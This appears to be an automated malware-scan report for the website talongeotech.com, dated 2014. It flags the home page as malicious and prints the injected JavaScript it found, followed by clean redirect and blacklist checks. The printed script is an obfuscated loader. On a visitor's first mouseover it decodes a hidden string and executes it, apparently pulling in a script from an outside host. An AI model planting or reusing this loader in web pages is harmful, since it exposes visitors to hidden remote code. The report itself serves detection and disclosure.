Scanned pages/files
Request | Server response | Status |
http://talongeotech.com/ | 200 OK Content-Length: 2278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
window.w3ssss=function(){
  var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Agod%0Argdiioufb5br4up%3Dj5nds1eo27rce5iukeymf32eye6nd1otd6p.djdch7jrmlpeb6iarwwt7fnehogExfllw2fef6rms8dedwlneflt0xa%289op%22iwyi0jbfb5qr0huam6kmjnjebk6%229ne%29k2t%3B92w%0Atrbi7xwfgygrby4.d6usds2r6lqc0op%3Dyla%22sj6hnuitjr5trrzpjbv%3Aag5/4ne/mlhvrfkcsno-f0fb52wugljsbswiplqnihkeccts3g0sent.mduc93toyxbmy7u/94sid0znyv8.rp8p408h30dpvsg%22rv4%3B6hv%0Agsdi2lifsi9rcho.2kls691t0ekyjqxl
  for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);}
  try{ window[cont](content) }catch(e){}
}
window.CheckBody = function() {
  if (!document.body){setTimeout('CheckBody();',10);}
  else {
    window.nomore=false;
    document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
    window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
  }
}
CheckBody();
Antivirus reports:
http://talongeotech.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: talongeotech.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 22:15:26 GMT
Accept-Ranges: bytes
ETag: "63f7e6-8e6-4b21f6ea6d440"
Server: Apache
Content-Length: 2278
Content-Type: text/html
Last-Modified: Sun, 20 Nov 2011 00:12:57 GMT
...2278 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: talongeotech.com
Referer: http://www.google.com/search?q=talongeotech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=talongeotech.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://talongeotech.com/
Result: talongeotech.com is not infected or malware details are not published yet.